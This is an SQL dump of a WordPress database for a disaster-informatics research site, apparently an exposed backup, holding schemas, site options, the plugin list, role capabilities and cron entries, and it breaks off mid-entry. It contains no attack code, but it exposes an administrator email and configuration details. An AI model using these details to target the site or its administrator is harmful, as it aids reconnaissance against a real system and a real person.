File: //proc/thread-self/root/mnt/vfs/webserver/wp_gsudice_db_backup.sql
/*!999999\- enable the sandbox mode */
-- MariaDB dump 10.19 Distrib 10.6.18-MariaDB, for debian-linux-gnu (x86_64)
--
-- Host: localhost Database: wp_gsudice_db
-- ------------------------------------------------------
-- Server version 10.6.18-MariaDB-0ubuntu0.22.04.1
/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8mb4 */;
/*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */;
/*!40103 SET TIME_ZONE='+00:00' */;
/*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */;
/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */;
/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */;
/*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */;
--
-- Table structure for table `wp_commentmeta`
--
DROP TABLE IF EXISTS `wp_commentmeta`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_commentmeta` (
`meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`comment_id` bigint(20) unsigned NOT NULL DEFAULT 0,
`meta_key` varchar(255) DEFAULT NULL,
`meta_value` longtext DEFAULT NULL,
PRIMARY KEY (`meta_id`),
KEY `comment_id` (`comment_id`),
KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_commentmeta`
--
LOCK TABLES `wp_commentmeta` WRITE;
/*!40000 ALTER TABLE `wp_commentmeta` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_commentmeta` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_comments`
--
DROP TABLE IF EXISTS `wp_comments`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_comments` (
`comment_ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`comment_post_ID` bigint(20) unsigned NOT NULL DEFAULT 0,
`comment_author` tinytext NOT NULL,
`comment_author_email` varchar(100) NOT NULL DEFAULT '',
`comment_author_url` varchar(200) NOT NULL DEFAULT '',
`comment_author_IP` varchar(100) NOT NULL DEFAULT '',
`comment_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`comment_date_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`comment_content` text NOT NULL,
`comment_karma` int(11) NOT NULL DEFAULT 0,
`comment_approved` varchar(20) NOT NULL DEFAULT '1',
`comment_agent` varchar(255) NOT NULL DEFAULT '',
`comment_type` varchar(20) NOT NULL DEFAULT 'comment',
`comment_parent` bigint(20) unsigned NOT NULL DEFAULT 0,
`user_id` bigint(20) unsigned NOT NULL DEFAULT 0,
PRIMARY KEY (`comment_ID`),
KEY `comment_post_ID` (`comment_post_ID`),
KEY `comment_approved_date_gmt` (`comment_approved`,`comment_date_gmt`),
KEY `comment_date_gmt` (`comment_date_gmt`),
KEY `comment_parent` (`comment_parent`),
KEY `comment_author_email` (`comment_author_email`(10))
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_comments`
--
LOCK TABLES `wp_comments` WRITE;
/*!40000 ALTER TABLE `wp_comments` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_comments` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_frmt_form_entry`
--
DROP TABLE IF EXISTS `wp_frmt_form_entry`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_frmt_form_entry` (
`entry_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`entry_type` varchar(191) NOT NULL,
`form_id` bigint(20) unsigned NOT NULL,
`is_spam` tinyint(1) NOT NULL DEFAULT 0,
`date_created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`draft_id` varchar(12) DEFAULT NULL,
PRIMARY KEY (`entry_id`),
KEY `entry_is_spam` (`is_spam`),
KEY `entry_type` (`entry_type`),
KEY `entry_form_id` (`form_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_frmt_form_entry`
--
LOCK TABLES `wp_frmt_form_entry` WRITE;
/*!40000 ALTER TABLE `wp_frmt_form_entry` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_frmt_form_entry` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_frmt_form_entry_meta`
--
DROP TABLE IF EXISTS `wp_frmt_form_entry_meta`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_frmt_form_entry_meta` (
`meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`entry_id` bigint(20) unsigned NOT NULL,
`meta_key` varchar(191) DEFAULT NULL,
`meta_value` longtext DEFAULT NULL,
`date_created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`date_updated` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
PRIMARY KEY (`meta_id`),
KEY `meta_key` (`meta_key`),
KEY `meta_entry_id` (`entry_id`),
KEY `meta_key_object` (`entry_id`,`meta_key`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_frmt_form_entry_meta`
--
LOCK TABLES `wp_frmt_form_entry_meta` WRITE;
/*!40000 ALTER TABLE `wp_frmt_form_entry_meta` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_frmt_form_entry_meta` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_frmt_form_reports`
--
DROP TABLE IF EXISTS `wp_frmt_form_reports`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_frmt_form_reports` (
`report_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`report_value` longtext NOT NULL,
`status` varchar(200) NOT NULL,
`date_created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`date_updated` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
PRIMARY KEY (`report_id`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_frmt_form_reports`
--
LOCK TABLES `wp_frmt_form_reports` WRITE;
/*!40000 ALTER TABLE `wp_frmt_form_reports` DISABLE KEYS */;
INSERT INTO `wp_frmt_form_reports` VALUES (1,'a:5:{s:7:\"exclude\";a:1:{i:0;i:1;}s:8:\"settings\";a:3:{s:5:\"label\";s:12:\"Form reports\";s:6:\"module\";s:5:\"forms\";s:10:\"forms_type\";s:3:\"all\";}s:8:\"schedule\";a:3:{s:9:\"frequency\";s:7:\"monthly\";s:8:\"monthDay\";s:1:\"4\";s:9:\"monthTime\";s:8:\"04:00 AM\";}s:13:\"report_status\";s:8:\"inactive\";s:10:\"recipients\";a:1:{i:0;a:5:{s:2:\"id\";i:1;s:4:\"name\";s:4:\"dice\";s:5:\"email\";s:13:\"dice@pobox.pw\";s:4:\"role\";s:13:\"Administrator\";s:6:\"avatar\";s:81:\"https://secure.gravatar.com/avatar/abd5c146aeb4fd0984e2e03788f82dd0?s=96&d=mm&r=g\";}}}','inactive','2023-09-29 10:05:13','2023-09-29 10:05:13');
/*!40000 ALTER TABLE `wp_frmt_form_reports` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_frmt_form_views`
--
DROP TABLE IF EXISTS `wp_frmt_form_views`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_frmt_form_views` (
`view_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`form_id` bigint(20) unsigned NOT NULL,
`page_id` bigint(20) unsigned NOT NULL,
`ip` varchar(191) DEFAULT NULL,
`count` mediumint(8) unsigned NOT NULL DEFAULT 1,
`date_created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`date_updated` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
PRIMARY KEY (`view_id`),
KEY `view_form_id` (`form_id`),
KEY `view_ip` (`ip`),
KEY `view_form_object` (`form_id`,`view_id`),
KEY `view_form_object_ip` (`form_id`,`view_id`,`ip`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_frmt_form_views`
--
LOCK TABLES `wp_frmt_form_views` WRITE;
/*!40000 ALTER TABLE `wp_frmt_form_views` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_frmt_form_views` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_links`
--
DROP TABLE IF EXISTS `wp_links`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_links` (
`link_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`link_url` varchar(255) NOT NULL DEFAULT '',
`link_name` varchar(255) NOT NULL DEFAULT '',
`link_image` varchar(255) NOT NULL DEFAULT '',
`link_target` varchar(25) NOT NULL DEFAULT '',
`link_description` varchar(255) NOT NULL DEFAULT '',
`link_visible` varchar(20) NOT NULL DEFAULT 'Y',
`link_owner` bigint(20) unsigned NOT NULL DEFAULT 1,
`link_rating` int(11) NOT NULL DEFAULT 0,
`link_updated` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`link_rel` varchar(255) NOT NULL DEFAULT '',
`link_notes` mediumtext NOT NULL,
`link_rss` varchar(255) NOT NULL DEFAULT '',
PRIMARY KEY (`link_id`),
KEY `link_visible` (`link_visible`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_links`
--
LOCK TABLES `wp_links` WRITE;
/*!40000 ALTER TABLE `wp_links` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_links` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_options`
--
DROP TABLE IF EXISTS `wp_options`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_options` (
`option_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`option_name` varchar(191) NOT NULL DEFAULT '',
`option_value` longtext NOT NULL,
`autoload` varchar(20) NOT NULL DEFAULT 'yes',
PRIMARY KEY (`option_id`),
UNIQUE KEY `option_name` (`option_name`),
KEY `autoload` (`autoload`)
) ENGINE=InnoDB AUTO_INCREMENT=312785 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_options`
--
LOCK TABLES `wp_options` WRITE;
/*!40000 ALTER TABLE `wp_options` DISABLE KEYS */;
INSERT INTO `wp_options` VALUES (1,'siteurl','https://gsudice.dataconn.net','yes'),(2,'home','https://gsudice.dataconn.net','yes'),(3,'blogname','Disaster Informatics & Computational Epidemiology','yes'),(4,'blogdescription','','yes'),(5,'users_can_register','0','yes'),(6,'admin_email','dice@pobox.pw','yes'),(7,'start_of_week','1','yes'),(8,'use_balanceTags','0','yes'),(9,'use_smilies','1','yes'),(10,'require_name_email','1','yes'),(11,'comments_notify','1','yes'),(12,'posts_per_rss','10','yes'),(13,'rss_use_excerpt','0','yes'),(14,'mailserver_url','mail.example.com','yes'),(15,'mailserver_login','login@example.com','yes'),(16,'mailserver_pass','password','yes'),(17,'mailserver_port','110','yes'),(18,'default_category','1','yes'),(19,'default_comment_status','open','yes'),(20,'default_ping_status','open','yes'),(21,'default_pingback_flag','1','yes'),(22,'posts_per_page','10','yes'),(23,'date_format','F j, Y','yes'),(24,'time_format','g:i a','yes'),(25,'links_updated_date_format','F j, Y g:i a','yes'),(26,'comment_moderation','0','yes'),(27,'moderation_notify','1','yes'),(28,'permalink_structure','','yes'),(29,'rewrite_rules','','yes'),(30,'hack_file','0','yes'),(31,'blog_charset','UTF-8','yes'),(32,'moderation_keys','','no'),(33,'active_plugins','a:3:{i:0;s:45:\"colibri-page-builder/colibri-page-builder.php\";i:1;s:31:\"custom-css-js/custom-css-js.php\";i:2;s:25:\"forminator/forminator.php\";}','yes'),(34,'category_base','','yes'),(35,'ping_sites','http://rpc.pingomatic.com/','yes'),(36,'comment_max_links','2','yes'),(37,'gmt_offset','','yes'),(38,'default_email_category','1','yes'),(39,'recently_edited','a:3:{i:0;s:74:\"/home/websites/gsudice.dataconn.net/wp-content/themes/colibri-wp/index.php\";i:2;s:74:\"/home/websites/gsudice.dataconn.net/wp-content/themes/colibri-wp/style.css\";i:3;s:0:\"\";}','no'),(40,'template','colibri-wp','yes'),(41,'stylesheet','colibri-wp','yes'),(42,'comment_registration','0','yes'),(43,'html_type','text/html','yes'),(44,'use_trackback','0','yes'),(45,'default_role','subscriber','yes'),(46,'db_version','55853','yes'),(47,'uploads_use_yearmonth_folders','1','yes'),(48,'upload_path','','yes'),(49,'blog_public','1','yes'),(50,'default_link_category','2','yes'),(51,'show_on_front','page','yes'),(52,'tag_base','','yes'),(53,'show_avatars','1','yes'),(54,'avatar_rating','G','yes'),(55,'upload_url_path','','yes'),(56,'thumbnail_size_w','150','yes'),(57,'thumbnail_size_h','150','yes'),(58,'thumbnail_crop','1','yes'),(59,'medium_size_w','300','yes'),(60,'medium_size_h','300','yes'),(61,'avatar_default','mystery','yes'),(62,'large_size_w','1024','yes'),(63,'large_size_h','1024','yes'),(64,'image_default_link_type','none','yes'),(65,'image_default_size','','yes'),(66,'image_default_align','','yes'),(67,'close_comments_for_old_posts','0','yes'),(68,'close_comments_days_old','14','yes'),(69,'thread_comments','1','yes'),(70,'thread_comments_depth','5','yes'),(71,'page_comments','0','yes'),(72,'comments_per_page','50','yes'),(73,'default_comments_page','newest','yes'),(74,'comment_order','asc','yes'),(75,'sticky_posts','a:0:{}','yes'),(76,'widget_categories','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(77,'widget_text','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(78,'widget_rss','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(79,'uninstall_plugins','a:0:{}','no'),(80,'timezone_string','America/New_York','yes'),(81,'page_for_posts','0','yes'),(82,'page_on_front','20','yes'),(83,'default_post_format','0','yes'),(84,'link_manager_enabled','0','yes'),(85,'finished_splitting_shared_terms','1','yes'),(86,'site_icon','94','yes'),(87,'medium_large_size_w','768','yes'),(88,'medium_large_size_h','0','yes'),(89,'wp_page_for_privacy_policy','3','yes'),(90,'show_comments_cookies_opt_in','1','yes'),(91,'admin_email_lifespan','1746552105','yes'),(92,'disallowed_keys','','no'),(93,'comment_previously_approved','1','yes'),(94,'auto_plugin_theme_update_emails','a:0:{}','no'),(95,'auto_update_core_dev','enabled','yes'),(96,'auto_update_core_minor','enabled','yes'),(97,'auto_update_core_major','enabled','yes'),(98,'wp_force_deactivated_plugins','a:0:{}','yes'),(99,'initial_db_version','51917','yes'),(100,'wp_user_roles','a:7:{s:13:\"administrator\";a:2:{s:4:\"name\";s:13:\"Administrator\";s:12:\"capabilities\";a:89:{s:13:\"switch_themes\";b:1;s:11:\"edit_themes\";b:1;s:16:\"activate_plugins\";b:1;s:12:\"edit_plugins\";b:1;s:10:\"edit_users\";b:1;s:10:\"edit_files\";b:1;s:14:\"manage_options\";b:1;s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:6:\"import\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:8:\"level_10\";b:1;s:7:\"level_9\";b:1;s:7:\"level_8\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:12:\"delete_users\";b:1;s:12:\"create_users\";b:1;s:17:\"unfiltered_upload\";b:1;s:14:\"edit_dashboard\";b:1;s:14:\"update_plugins\";b:1;s:14:\"delete_plugins\";b:1;s:15:\"install_plugins\";b:1;s:13:\"update_themes\";b:1;s:14:\"install_themes\";b:1;s:11:\"update_core\";b:1;s:10:\"list_users\";b:1;s:12:\"remove_users\";b:1;s:13:\"promote_users\";b:1;s:18:\"edit_theme_options\";b:1;s:13:\"delete_themes\";b:1;s:6:\"export\";b:1;s:23:\"staff_categories_editor\";b:1;s:23:\"manage_staff_categories\";b:1;s:23:\"assign_staff_categories\";b:1;s:17:\"edit_staff_member\";b:1;s:17:\"read_staff_member\";b:1;s:18:\"read_staff_members\";b:1;s:19:\"delete_staff_member\";b:1;s:18:\"edit_staff_members\";b:1;s:25:\"edit_others_staff_members\";b:1;s:21:\"publish_staff_members\";b:1;s:26:\"read_private_staff_members\";b:1;s:20:\"delete_staff_members\";b:1;s:28:\"delete_private_staff_members\";b:1;s:30:\"delete_published_staff_members\";b:1;s:27:\"delete_others_staff_members\";b:1;s:26:\"edit_private_staff_members\";b:1;s:28:\"edit_published_staff_members\";b:1;s:17:\"manage_forminator\";b:1;s:15:\"edit_custom_css\";b:1;s:15:\"read_custom_css\";b:1;s:17:\"delete_custom_css\";b:1;s:16:\"edit_custom_csss\";b:1;s:23:\"edit_others_custom_csss\";b:1;s:19:\"publish_custom_csss\";b:1;s:18:\"delete_custom_csss\";b:1;s:28:\"delete_published_custom_csss\";b:1;s:25:\"delete_others_custom_csss\";b:1;s:26:\"edit_published_custom_csss\";b:1;}}s:6:\"editor\";a:2:{s:4:\"name\";s:6:\"Editor\";s:12:\"capabilities\";a:51:{s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:23:\"staff_categories_editor\";b:1;s:23:\"manage_staff_categories\";b:1;s:23:\"assign_staff_categories\";b:1;s:17:\"edit_staff_member\";b:1;s:17:\"read_staff_member\";b:1;s:18:\"read_staff_members\";b:1;s:19:\"delete_staff_member\";b:1;s:18:\"edit_staff_members\";b:1;s:25:\"edit_others_staff_members\";b:1;s:21:\"publish_staff_members\";b:1;s:26:\"read_private_staff_members\";b:1;s:20:\"delete_staff_members\";b:1;s:28:\"delete_private_staff_members\";b:1;s:30:\"delete_published_staff_members\";b:1;s:27:\"delete_others_staff_members\";b:1;s:26:\"edit_private_staff_members\";b:1;s:28:\"edit_published_staff_members\";b:1;}}s:6:\"author\";a:2:{s:4:\"name\";s:6:\"Author\";s:12:\"capabilities\";a:10:{s:12:\"upload_files\";b:1;s:10:\"edit_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:4:\"read\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:12:\"delete_posts\";b:1;s:22:\"delete_published_posts\";b:1;}}s:11:\"contributor\";a:2:{s:4:\"name\";s:11:\"Contributor\";s:12:\"capabilities\";a:5:{s:10:\"edit_posts\";b:1;s:4:\"read\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:12:\"delete_posts\";b:1;}}s:10:\"subscriber\";a:2:{s:4:\"name\";s:10:\"Subscriber\";s:12:\"capabilities\";a:2:{s:4:\"read\";b:1;s:7:\"level_0\";b:1;}}s:22:\"colibri_content_editor\";a:2:{s:4:\"name\";s:14:\"Content Editor\";s:12:\"capabilities\";a:36:{s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:18:\"edit_theme_options\";b:1;s:9:\"customize\";b:1;}}s:15:\"css_js_designer\";a:2:{s:4:\"name\";s:12:\"Web Designer\";s:12:\"capabilities\";a:10:{s:15:\"edit_custom_css\";b:1;s:15:\"read_custom_css\";b:1;s:17:\"delete_custom_css\";b:1;s:16:\"edit_custom_csss\";b:1;s:23:\"edit_others_custom_csss\";b:1;s:19:\"publish_custom_csss\";b:1;s:18:\"delete_custom_csss\";b:1;s:28:\"delete_published_custom_csss\";b:1;s:25:\"delete_others_custom_csss\";b:1;s:26:\"edit_published_custom_csss\";b:1;}}}','yes'),(101,'fresh_site','0','yes'),(102,'widget_block','a:6:{i:2;a:1:{s:7:\"content\";s:60:\"<!-- wp:search {\"showLabel\":false,\"buttonUseIcon\":true} /-->\";}i:3;a:1:{s:7:\"content\";s:154:\"<!-- wp:group --><div class=\"wp-block-group\"><!-- wp:heading --><h2>Recent Posts</h2><!-- /wp:heading --><!-- wp:latest-posts /--></div><!-- /wp:group -->\";}i:4;a:1:{s:7:\"content\";s:227:\"<!-- wp:group --><div class=\"wp-block-group\"><!-- wp:heading --><h2>Recent Comments</h2><!-- /wp:heading --><!-- wp:latest-comments {\"displayAvatar\":false,\"displayDate\":false,\"displayExcerpt\":false} /--></div><!-- /wp:group -->\";}i:5;a:1:{s:7:\"content\";s:146:\"<!-- wp:group --><div class=\"wp-block-group\"><!-- wp:heading --><h2>Archives</h2><!-- /wp:heading --><!-- wp:archives /--></div><!-- /wp:group -->\";}i:6;a:1:{s:7:\"content\";s:150:\"<!-- wp:group --><div class=\"wp-block-group\"><!-- wp:heading --><h2>Categories</h2><!-- /wp:heading --><!-- wp:categories /--></div><!-- /wp:group -->\";}s:12:\"_multiwidget\";i:1;}','yes'),(103,'sidebars_widgets','a:14:{s:19:\"wp_inactive_widgets\";a:2:{i:0;s:7:\"block-5\";i:1;s:7:\"block-6\";}s:22:\"colibri-ecommerce-left\";a:1:{i:0;s:15:\"custom_html-112\";}s:17:\"colibri-sidebar-1\";a:4:{i:0;s:7:\"block-2\";i:1;s:7:\"block-3\";i:2;s:7:\"block-4\";i:3;s:15:\"custom_html-113\";}s:28:\"colibri-header-widget-area-1\";a:1:{i:0;s:15:\"custom_html-114\";}s:28:\"colibri-header-widget-area-2\";a:1:{i:0;s:15:\"custom_html-115\";}s:28:\"colibri-header-widget-area-3\";a:1:{i:0;s:15:\"custom_html-116\";}s:29:\"colibri-content-widget-area-1\";a:1:{i:0;s:15:\"custom_html-117\";}s:29:\"colibri-content-widget-area-2\";a:1:{i:0;s:15:\"custom_html-118\";}s:29:\"colibri-content-widget-area-3\";a:1:{i:0;s:15:\"custom_html-119\";}s:28:\"colibri-footer-widget-area-1\";a:1:{i:0;s:15:\"custom_html-120\";}s:28:\"colibri-footer-widget-area-2\";a:1:{i:0;s:15:\"custom_html-121\";}s:28:\"colibri-footer-widget-area-3\";a:1:{i:0;s:15:\"custom_html-122\";}s:28:\"colibri-footer-widget-area-4\";a:1:{i:0;s:15:\"custom_html-123\";}s:13:\"array_version\";i:3;}','yes'),(104,'cron','a:12:{i:1732932599;a:1:{s:25:\"forminator_process_report\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:12:\"every_minute\";s:4:\"args\";a:0:{}s:8:\"interval\";i:60;}}}i:1732932612;a:1:{s:22:\"forminator_send_export\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:12:\"every_minute\";s:4:\"args\";a:0:{}s:8:\"interval\";i:60;}}}i:1732932768;a:1:{s:42:\"forminator_general_data_protection_cleanup\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1732934672;a:1:{s:34:\"wp_privacy_delete_old_export_files\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1732959872;a:4:{s:18:\"wp_https_detection\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}s:16:\"wp_version_check\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}s:17:\"wp_update_plugins\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}s:16:\"wp_update_themes\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1732971711;a:1:{s:21:\"wp_update_user_counts\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1732997983;a:1:{s:30:\"schedule_forminator_daily_cron\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:2:{s:8:\"schedule\";b:0;s:4:\"args\";a:0:{}}}}i:1733003072;a:1:{s:32:\"recovery_mode_clean_expired_keys\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1733003078;a:3:{s:19:\"wp_scheduled_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}s:25:\"delete_expired_transients\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}s:30:\"wp_scheduled_auto_draft_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"